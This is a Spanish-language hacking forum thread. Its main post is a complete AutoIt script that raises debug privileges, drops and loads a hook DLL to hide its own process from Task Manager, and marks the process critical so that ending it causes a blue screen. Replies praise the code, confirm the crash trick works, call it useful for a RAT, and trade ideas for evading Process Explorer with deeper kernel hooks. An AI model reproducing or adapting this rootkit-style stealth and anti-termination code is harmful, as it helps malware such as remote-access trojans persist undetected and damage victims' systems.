• Fuentes

 #404702  por M3
 
Buenas , los dejo esta funcion que ay traduzido para AutoIt

Su funcionamiento és muy util creo :

No salta en la pantala de Task Manager el proceso activo e

se intentas cerrar el processo por otros medios .... BSOD ( Pantala Azul )

Que lo disfrutem

PD : la version que carga la Dll 'Onthefly' me la guardo xD

Saludos



Código: Seleccionar todo
#RequireAdmin
#include <WinApi.au3>

;==========================================================
; Func sHideProcess
; Hide Process From TaskManager With Privilege
; Author : M3
; Usage : sHideProcess()
; Thanks to : Pink | Houdini | Guests AHK
; Release : 16 / 02 / 2013
; Download Dll x86 | x64
; [url]http://www.datafilehost.com/download-bbb317e0.html[/url]
;==========================================================


sHideProcess()


Func sHideProcess()

Local $sStructData , $sStruct , $sLoadDll , $sDllLoaded , $GetProcessAdd , _
      $sDllAdress , $sHook , $sReturn , $sHandle, $ProcessId ,$sBsodStruct


If Not @Compiled then
    MsgBox(0,'','Compile Code to Test',1)
    Exit
EndIf


If @AutoItX64 = False Then

sDebugPrivilege()

FileInstall('Hook.dll' , @WindowsDir & '\Hook.dll')

;Else

;FileInstall('Hook64.dll' , @WindowsDir & '\Hook.dll')

;EndIf

Msgbox(0,'','Hiding Process' , 2)

$sStructData = 'int LoadDll;int DllAdress;int BSOD'

$sStruct = DllStructCreate($sStructData)


If @error Then
    MsgBox(0, '', 'Error en la Structura ...' , 2)
    Exit
EndIf


$sLoadDll =  DllCall('Kernel32.dll', 'handle', 'LoadLibrary', 'str', @WindowsDir & '\Hook.dll') ;for x86

DllStructSetData($sStruct, 'LoadDll', $sLoadDll[0])

$sDllLoaded = DllStructGetData($sStruct , 1)

$GetProcessAdd = CallAPI_GetProcAddress($sDllLoaded,  'Hidden')

DllStructSetData($sStruct, 'DllAdress', $GetProcessAdd)

$sDllAdress = DllStructGetData($sStruct ,2)

$sHook = CallAPI_SetWindowsHookEx (5, $sDllAdress ,  $sDllLoaded)

$ProcessId = _WinAPI_GetCurrentProcessID()

$sHandle = CallAPI_OpenProcess('0X001F0FFF' , True , $ProcessId)

DllStructSetData($sStruct,'BSOD',true)

$sBsodStruct = DllStructGetPtr($sStruct , 3)

$Return = CallAPI_NtSetInformationProcess ($sHandle , 29 , $sBsodStruct ,4)

_WinAPI_CloseHandle ($sHandle)

EndIf


EndFunc




while 1

	Sleep(7000)
	MsgBox(0,'','Malware is Running with Privileges ...' , 2)

WEnd





Func sDebugPrivilege ()

Local $HToken,$HLastError

$HToken = _Security__OpenThreadTokenEx (BITOR($Token_Adjust_Privileges, $Token_Query))

$HLastError = _Security__SetPrivilege($HToken, 'SeDebugPrivilege' , True)

_WinAPI_CloseHandle($HToken)

Return $HLastError

EndFunc




Func CallAPI_GetProcAddress($hModule, $sProcess)

    Local $sReturn = DllCall('Kernel32', 'ptr', 'GetProcAddress', 'ptr', $hModule, 'str', $sProcess)

	Return  $sReturn[0]

EndFunc




Func CallAPI_SetWindowsHookEx($idHook, $lpfn, $hmod, $dwThreadId = 0)

	Local $sReturn = DllCall('User32', 'handle', 'SetWindowsHookEx', 'int', $idHook, 'ptr', $lpfn, 'handle', $hmod, 'dword', $dwThreadId)

	Return $sReturn[0]

EndFunc




Func CallAPI_UnhookWindowsHookEx($hhk)

	Local $sReturn = DllCall('User32', 'bool', 'UnhookWindowsHookEx', 'handle', $hhk)

	Return $sReturn[0]

EndFunc



Func CallAPI_OpenProcess($iAccess, $bInherit, $iProcessID)

      Local $sResult = DllCall('Kernel32', 'int', 'OpenProcess', 'int', $iAccess, 'int', $bInherit, 'int', $iProcessID)

      Return $sResult[0]

EndFunc



Func CallAPI_NtSetInformationProcess($sHandle , $ProcClass, $ProcInfo, $ProcLength )

      Local $sResult = DllCall ('Ntdll' , 'int' , 'NtSetInformationProcess', 'handle', $sHandle , 'int' ,$ProcClass , 'ptr' , $ProcInfo ,'uLong', $ProcLength)

	  Return  $sResult [0]

EndFunc
 #404705  por KHC
 
Lindo hook @M3!
Buena base para documentar en este lenguaje :)
 #404712  por M3
 
KHC escribió:Lindo hook @M3!
Buena base para documentar en este lenguaje :)

Gracias compadre , me tardo un poko pero quedo bueno ao final , un saludo
 #404876  por M3
 
adwind escribió:No lo habia visto pero esta bueno eso!


Un excelente Code :D

Que va , gracias tio , un saludo


Gracias por los comentarios

 #425721  por x4r0r
 
Un pokito mas de imagacion y el process explorer no lo ve ...

tal vez podamos hablar en privado mandame tu FB o gmail...te cuento mi metodo
 #425722  por M3
 
x4r0r escribió:Un pokito mas de imagacion y el process explorer no lo ve ...

tal vez podamos hablar en privado mandame tu FB o gmail...te cuento mi metodo

imagino que hables de un hook a NtQuerySystemInformation ¿ ( se si , mira el link de mi firma )

te envio un MP , un gusto hablar-te

Saludo

 #425788  por M3
 
Himanen escribió:Gracias tío, confirmo que el BSOD funciona de puta madre

Salud!
que bueno compadre me alegro , espero el hide = tenga te funcionado capo

Saludo
 #425808  por xxxPoseidonxxx
 
Joder esto es un buen método, lastima que no soy capaz de leer Autoit 100% y no puedo comprender bien su código. Pero esta muy bien para un RAT!
Gracias!
 #426002  por x4r0r
 
disculpame por no responderte a tiempo...

mira todo depende que tan interno sea el gancho (hook) , el hoo de esa api no es nivel kernel hay algo mas profundo es ahmm no recuerdo el nombre de la tabla de procesos , tngo entendido que sysinternals verifica procesos desd nivel kernel
habria que probar

no me haz mandado tu facebook...
 #426020  por M3
 
x4r0r escribió:disculpame por no responderte a tiempo...

mira todo depende que tan interno sea el gancho (hook) , el hoo de esa api no es nivel kernel hay algo mas profundo es ahmm no recuerdo el nombre de la tabla de procesos , tngo entendido que sysinternals verifica procesos desd nivel kernel
habria que probar

no me haz mandado tu facebook...

Te Envie MP , pero creo no te lhego , raro que = no veo el MP en enviados xD , quisas debo canbiar de hieba

tranki bro, a ver lo que hablas que sea mas profundo que nivel kernel , hablamos CD puedas , te enviare mi MSN , no tengo FeoBook

 #426132  por x4r0r
 
Imagen

http://www.exploit-monday.com/2013/06/u ... ation.html

SeSinglePrivilegeCheck

M3 odio msn ...creo ke nos comunicaremos por privado xD cuando tenga tiempo te mando el codigo ke tengo aca ya tu lo compilas ...y lo analizas mas profundo...

hay te dejo algo mas de info ..arriba